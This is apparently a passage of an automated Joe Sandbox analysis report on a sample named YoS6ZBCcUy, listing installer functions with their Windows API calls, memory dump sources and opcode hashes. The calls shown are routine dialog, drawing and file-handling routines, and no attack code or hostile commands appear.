                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0e4e8af0329ccb159007ad6c77c0af05cb35f857c46231da8f5d0a1659340364
                                                                                                                                                                                              • Instruction ID: 59779062152899835760f0dc2f5c49596223a290c6efd11eddd93cbc7c663e45
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e4e8af0329ccb159007ad6c77c0af05cb35f857c46231da8f5d0a1659340364
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                                                              Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                              • String ID: N$Remove folder: $gC@
                                                                                                                                                                                              • API String ID: 3103080414-3559505530
                                                                                                                                                                                              • Opcode ID: 96cce4fce431ccadf5917f17b99feddee1f1d895ae547b1ae29d71d99e1dfbb5
                                                                                                                                                                                              • Instruction ID: 3402c350d7270d9961c63d8365249516a5ebc70a9ec23ab72cb453283ebd69b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 96cce4fce431ccadf5917f17b99feddee1f1d895ae547b1ae29d71d99e1dfbb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7761BEB1900209BFDB009F60DD85EAA7B69FB85305F00843AF705B62D0D77D9961CF99
                                                                                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                              • DrawTextW.USER32(00000000,00472EE0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                              • Opcode ID: bf214f377d6857cb708af565e6f61848071267d92be3f24c40ffd1659e9a65ef
                                                                                                                                                                                              • Instruction ID: 4eb8147a30471c2b969484520d7d1b1c24976f3a1718a772f7b725b3b94c1b26
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf214f377d6857cb708af565e6f61848071267d92be3f24c40ffd1659e9a65ef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C418A71800249AFCF058FA5DE459AF7BB9FF44314F00842AF991AA1A0C778D954DFA4
                                                                                                                                                                                              Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,004688E8,00000400), ref: 00405F4A
                                                                                                                                                                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,004690E8,00000400), ref: 00405F67
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004690E8,C0000000,00000004,004690E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004684E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                                                                              • Opcode ID: b694a888aaf83b7fce4c3b5560ec35c5a1d29ec5cfaa1e3dee45fb0367e4abd5
                                                                                                                                                                                              • Instruction ID: 1ccef14564d3a4e3590f6d96bf23d62cdd24cd7414a0bd79904b9c13782922cd
                                                                                                                                                                                              • Opcode Fuzzy Hash: b694a888aaf83b7fce4c3b5560ec35c5a1d29ec5cfaa1e3dee45fb0367e4abd5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08312530641B05BBC220AB659D48F6B3AACDF45744F15003FFA42F72C2EB7C98118AAD
                                                                                                                                                                                              Function 00405322 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                              • lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                              • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0), ref: 0040537D
                                                                                                                                                                                              • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 0040538F
                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                              • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\
                                                                                                                                                                                              • API String ID: 2531174081-796932600
                                                                                                                                                                                              • Opcode ID: 03d69ce82fc4e5908464ead601bb3ac1f64f2a51dd32175340e58c4215b781fb
                                                                                                                                                                                              • Instruction ID: c4a8b4fbc7344707c8dcd13f789004ac01d88f238d1262f53b2d1dabcf784db2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03d69ce82fc4e5908464ead601bb3ac1f64f2a51dd32175340e58c4215b781fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21A171900518BBCB11AFA5DD849CFBFB9EF45350F10807AF904B62A0C7B94A80DFA8
                                                                                                                                                                                              Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                              • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                              • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                              Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                              • String ID: 9
                                                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                                                              • Opcode ID: 14dc679b194e2ee8669cd1598f353bf1a997ac59cdf020ac1a3b5a5ea93b2031
                                                                                                                                                                                              • Instruction ID: 75c70889326ed48cf653b65eedce39ba48716a77e36bbd16e72a3e0392bfe49c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 14dc679b194e2ee8669cd1598f353bf1a997ac59cdf020ac1a3b5a5ea93b2031
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C511975D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB58
                                                                                                                                                                                              Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                              • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                                                              Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5D0), ref: 00401E3E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
